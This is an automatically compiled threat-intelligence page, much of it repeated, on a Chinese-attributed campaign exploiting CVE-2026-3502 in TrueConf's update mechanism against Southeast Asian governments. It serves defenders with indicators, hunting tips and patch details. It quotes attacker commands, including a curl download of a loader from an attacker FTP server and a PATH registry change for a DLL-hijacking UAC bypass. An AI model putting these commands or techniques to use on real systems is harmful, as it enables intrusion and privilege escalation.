INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).

TrueConf Zero-Day Exploited in Southeast Asian Government Network Attacks

| 2026-03-31 16:03 CRITICAL HIGH
JSON
Executive Summary AI-generated
The TrueChaos campaign has been linked to a high-severity security flaw in the TrueConf client video conferencing software, exploiting CVE-2026-3502 which allows an attacker to distribute and execute arbitrary code. The vulnerability stems from the abuse of the update mechanism validation mechanism by Chinese threat actors, who can gain control over on-premises servers and substitute legitimate updates with poisoned versions, compromising all connected endpoints.
Technical Mitigations AI-generated
* Implement a secure update mechanism that enforces adequate validation to ensure the server-provided update has not been tampered with, such as using digital signatures or encryption. * Regularly review and audit client configurations to prevent attackers from exploiting vulnerabilities like CVE-2026-3502 by abusing trusted relationships between servers and clients. * Use intrusion detection systems (IDS) and security information and event management (SIEM) tools to monitor for suspicious activity related to the TrueConf update mechanism, such as unusual network traffic or login attempts. * Educate users about the importance of keeping their software up-to-date with the latest patches and updates, including those specifically addressing vulnerabilities like CVE-2026-3502. * Consider implementing a "zero-trust" approach by assuming that all endpoints are vulnerable until proven otherwise, and require additional authentication and authorization before allowing access to sensitive areas.
Technical Observables
AI Podcast (EN) detail_available
detail_listen_ai (EN)
Intelligence distributed on:
Incident Link
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
Operation TrueChaosOperation TrueChaos ShadowPadShadowPadHavocHavoc CVE-2026-3502CVE-2026-3502
Target & Sectors
APAC APAC EUROPE EUROPE
Incident Timeline
‎March 2026
Threat actors exploited a zero-day vulnerability in the TrueConf Windows client to target government networks in Southeast Asia.
infrastructure Windows
Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, which was  released in March 2026 .
infrastructure 8.5.3
Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, which was  released in March 2026 .
organisation TrueConf Windows
Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, which was  released in March 2026 .
‎Mar 31, 2026
The threat actors exploited a CVE-2026-3502 vulnerability in the TrueConf client video conferencing software to target government entities in Southeast Asia.
target_region APAC
 Ravie Lakshmanan  Mar 31, 2026 Zero-Day / Vulnerability A high-severity security flaw in the TrueConf client video conferencing software has been exploited in the wild as a zero-day as part of a campaign targeting government entities in Southeast Asia dubbed TrueChaos .
attribution TrueChaos
 Ravie Lakshmanan  Mar 31, 2026 Zero-Day / Vulnerability A high-severity security flaw in the TrueConf client video conferencing software has been exploited in the wild as a zero-day as part of a campaign targeting government entities in Southeast Asia dubbed TrueChaos .
The TrueChaos campaign has been found to weaponize this flaw in the update mechanism to likely deploy the open-source Havoc command-and-control (C2) framework to vulnerable endpoints.
organisation FTP
The DLL implant ("7z-x64.dll") has also been observed performing hands-on-keyboard actions to conduct reconnaissance, set up persistence, and retrieve additional payloads ("iscsiexe.dll") from an FTP server ("47.237.15[.]197").
infrastructure Windows
It has been patched in the TrueConf Windows client starting with version 8.5.3 , released earlier this month.
infrastructure 8.5.3
It has been patched in the TrueConf Windows client starting with version 8.5.3 , released earlier this month.
infrastructure 7.8
The vulnerability in question is CVE-2026-3502 (CVSS score: 7.8), a lack of integrity check when fetching application update code, allowing an attacker to distribute a tampered update, resulting in the execution of arbitrary code.
‎2026/03/31
Threat actors used the malicious 7z-x64.dll implant to exploit a zero-day vulnerability in TrueConf, a video conferencing platform that operates entirely within a private local network (LAN) without requiring an internet connection.
infrastructure Winrar
Figure 6 – Attacker Hands-on-Keyboard Activity Initial reconnaissance included commands such as: tasklist > cache tracert 8.8.8.8 -h 5 Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory: curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x
Hunt for poweriso.exe spawning commands through cmd.exe , particularly when the command line includes tools or utilities such as curl , winrar.exe , or netstat , since this may indicate download, extraction, or discovery activity.
infrastructure 8.8.8
Figure 6 – Attacker Hands-on-Keyboard Activity Initial reconnaissance included commands such as: tasklist > cache tracert 8.8.8.8 -h 5 Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory: curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x
infrastructure 47.237.15
Figure 6 – Attacker Hands-on-Keyboard Activity Initial reconnaissance included commands such as: tasklist > cache tracert 8.8.8.8 -h 5 Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory: curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x
Indicators of Compromise trueconf_windows_update.exe – Malicious TrueConf client update 22e32bcf113326e366ac480b077067cf iscsiexe.dll – Loader 9b435ad985b733b64a6d5f39080f4ae0 7z-x64.dll – Havoc implant 248a4d7d4c48478dcbeade8f7dba80b3 43.134.90[.]60 – Havoc C2 43.134.52[.]221 – Havoc C2 47.237.15[.]197 – Havoc C2
organisation FTP
Figure 6 – Attacker Hands-on-Keyboard Activity Initial reconnaissance included commands such as: tasklist > cache tracert 8.8.8.8 -h 5 Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory: curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x
organisation DLL
Alongside the legitimate TrueConf installation components, the package dropped a benign  poweriso.exe  executable and a malicious  7z-x64.dll  file to the path  c:\programdata\poweriso\ , which was then loaded through DLL side-loading.
infrastructure 43.134.90
Indicators of Compromise trueconf_windows_update.exe – Malicious TrueConf client update 22e32bcf113326e366ac480b077067cf iscsiexe.dll – Loader 9b435ad985b733b64a6d5f39080f4ae0 7z-x64.dll – Havoc implant 248a4d7d4c48478dcbeade8f7dba80b3 43.134.90[.]60 – Havoc C2 43.134.52[.]221 – Havoc C2 47.237.15[.]197 – Havoc C2
infrastructure 43.134.52
Indicators of Compromise trueconf_windows_update.exe – Malicious TrueConf client update 22e32bcf113326e366ac480b077067cf iscsiexe.dll – Loader 9b435ad985b733b64a6d5f39080f4ae0 7z-x64.dll – Havoc implant 248a4d7d4c48478dcbeade8f7dba80b3 43.134.90[.]60 – Havoc C2 43.134.52[.]221 – Havoc C2 47.237.15[.]197 – Havoc C2
infrastructure Windows
By placing a malicious  iscsiexe.dll  in a user-controlled location referenced through the user’s  %PATH% , an attacker can cause Windows to resolve and load that DLL in the context of the elevated  iscsicpl.exe , resulting in privilege escalation without a UAC prompt.
"C:\users\<redacted>\appdata\local\temp" /f c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe iscsicpl.exe  is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit  SysWOW64  version is auto-elevated and is vulnerable to DLL search-order hijacking for  iscsiexe.dll .
Treat the system as potentially infected if the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe , as this indicates persistence through a user logon autorun entry.
organisation UAC
"C:\users\<redacted>\appdata\local\temp" /f c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe iscsicpl.exe  is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit  SysWOW64  version is auto-elevated and is vulnerable to DLL search-order hijacking for  iscsiexe.dll .
organisation logon
Treat the system as potentially infected if the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe , as this indicates persistence through a user logon autorun entry.
organisation Check Point Research
Key Points Check Point Research identified a zero-day vulnerability in the TrueConf client application, tracked as  CVE-2026-3502 , with a  CVSS score of 7.8 .
organisation Root Cause Analysis
Figure 1 – Geographic Distribution of Internet-Exposed TrueConf Servers CVE-2026-3502 Root Cause Analysis When the TrueConf client starts, it checks the connected on-premises server for available updates.
infrastructure 8.5.2
The current version of the desktop apps is 8.5.2.
It would successfully upgrade the client version from 8.5.1 to the current at the time 8.5.2.
infrastructure 8.5.1
It would successfully upgrade the client version from 8.5.1 to the current at the time 8.5.2.
organisation Attribution Check Point Research
Attribution Check Point Research assesses with moderate confidence that operation TrueChaos is associated with a Chinese-nexus threat actor.
organisation TrueChaos
Attribution Check Point Research assesses with moderate confidence that operation TrueChaos is associated with a Chinese-nexus threat actor.
organisation Alibaba Cloud and Tencent
The assessment is based on a combination of factors, including TTPs consistent with Chinese-nexus operations such as DLL sideloading, the use of Alibaba Cloud and Tencent hosting for command-and-control infrastructure and the victimology aligns with Chinese nexus strategic interests.
organisation LAN
Basically, TrueConf acts as an on-premises video conferencing solution that operates entirely within a private local network (LAN) without requiring an internet connection.
organisation PATH
The attacker then modified the current user’s  PATH  variable, in order to preform UAC bypass by using the  Microsoft iSCSI Initiator Control Panel tool : reg add "hkcu\environment" /v path /t
organisation Microsoft
The attacker then modified the current user’s  PATH  variable, in order to preform UAC bypass by using the  Microsoft iSCSI Initiator Control Panel tool : reg add "hkcu\environment" /v path /t
‎the beginning of 2026
Threat actors used a TrueConf zero-day exploit in targeted attacks against government entities in Southeast Asia.
target_region APAC
Introduction At the beginning of 2026, Check Point Research observed a series of targeted attacks against government entities in Southeast Asia carried out via a legitimate TrueConf software installed in the targets’ environment.
organisation DLL
Attacks exploiting the vulnerability were first recorded by the cybersecurity company at the beginning of 2026, with the implicit trust the client places in the update mechanism being weaponized to push a rogue installer that, in turn, leverages DLL side-loading to launch a DLL backdoor.
Tactical Metrics
Metrics
infrastructure
​Winrar
Affected Product
Figure 6 – Attacker Hands-on-Keyboard Activity Initial reconnaissance included commands such as: tasklist > cache tracert 8.8.8.8 -h 5 Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory: curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x
Hunt for poweriso.exe spawning commands through cmd.exe , particularly when the command line includes tools or utilities such as curl , winrar.exe , or netstat , since this may indicate download, extraction, or discovery activity.
Metrics
infrastructure
​8.8.8
Software Version
Figure 6 – Attacker Hands-on-Keyboard Activity Initial reconnaissance included commands such as: tasklist > cache tracert 8.8.8.8 -h 5 Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory: curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x
Metrics
infrastructure
​47.237.15
Software Version
Figure 6 – Attacker Hands-on-Keyboard Activity Initial reconnaissance included commands such as: tasklist > cache tracert 8.8.8.8 -h 5 Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory: curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x
Indicators of Compromise trueconf_windows_update.exe – Malicious TrueConf client update 22e32bcf113326e366ac480b077067cf iscsiexe.dll – Loader 9b435ad985b733b64a6d5f39080f4ae0 7z-x64.dll – Havoc implant 248a4d7d4c48478dcbeade8f7dba80b3 43.134.90[.]60 – Havoc C2 43.134.52[.]221 – Havoc C2 47.237.15[.]197 – Havoc C2
Metrics
infrastructure
​Windows
Affected Product
By placing a malicious  iscsiexe.dll  in a user-controlled location referenced through the user’s  %PATH% , an attacker can cause Windows to resolve and load that DLL in the context of the elevated  iscsicpl.exe , resulting in privilege escalation without a UAC prompt.
Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, which was  released in March 2026 .
"C:\users\<redacted>\appdata\local\temp" /f c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe iscsicpl.exe  is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit  SysWOW64  version is auto-elevated and is vulnerable to DLL search-order hijacking for  iscsiexe.dll .
Treat the system as potentially infected if the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe , as this indicates persistence through a user logon autorun entry.
It has been patched in the TrueConf Windows client starting with version 8.5.3 , released earlier this month.
Metrics
infrastructure
​8.5.3
Software Version
Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, which was  released in March 2026 .
It has been patched in the TrueConf Windows client starting with version 8.5.3 , released earlier this month.
Metrics
infrastructure
​8.5.2
Software Version
The current version of the desktop apps is 8.5.2.
It would successfully upgrade the client version from 8.5.1 to the current at the time 8.5.2.
Metrics
infrastructure
​8.5.1
Software Version
It would successfully upgrade the client version from 8.5.1 to the current at the time 8.5.2.
Metrics
infrastructure
​43.134.90
Software Version
Indicators of Compromise trueconf_windows_update.exe – Malicious TrueConf client update 22e32bcf113326e366ac480b077067cf iscsiexe.dll – Loader 9b435ad985b733b64a6d5f39080f4ae0 7z-x64.dll – Havoc implant 248a4d7d4c48478dcbeade8f7dba80b3 43.134.90[.]60 – Havoc C2 43.134.52[.]221 – Havoc C2 47.237.15[.]197 – Havoc C2
Metrics
infrastructure
​43.134.52
Software Version
Indicators of Compromise trueconf_windows_update.exe – Malicious TrueConf client update 22e32bcf113326e366ac480b077067cf iscsiexe.dll – Loader 9b435ad985b733b64a6d5f39080f4ae0 7z-x64.dll – Havoc implant 248a4d7d4c48478dcbeade8f7dba80b3 43.134.90[.]60 – Havoc C2 43.134.52[.]221 – Havoc C2 47.237.15[.]197 – Havoc C2
Metrics
infrastructure
​7.8
Software Version
The vulnerability in question is CVE-2026-3502 (CVSS score: 7.8), a lack of integrity check when fetching application update code, allowing an attacker to distribute a tampered update, resulting in the execution of arbitrary code.
Intelligence Sources
Zero Day Fans 2026-03-31
The Hacker News 2026-03-31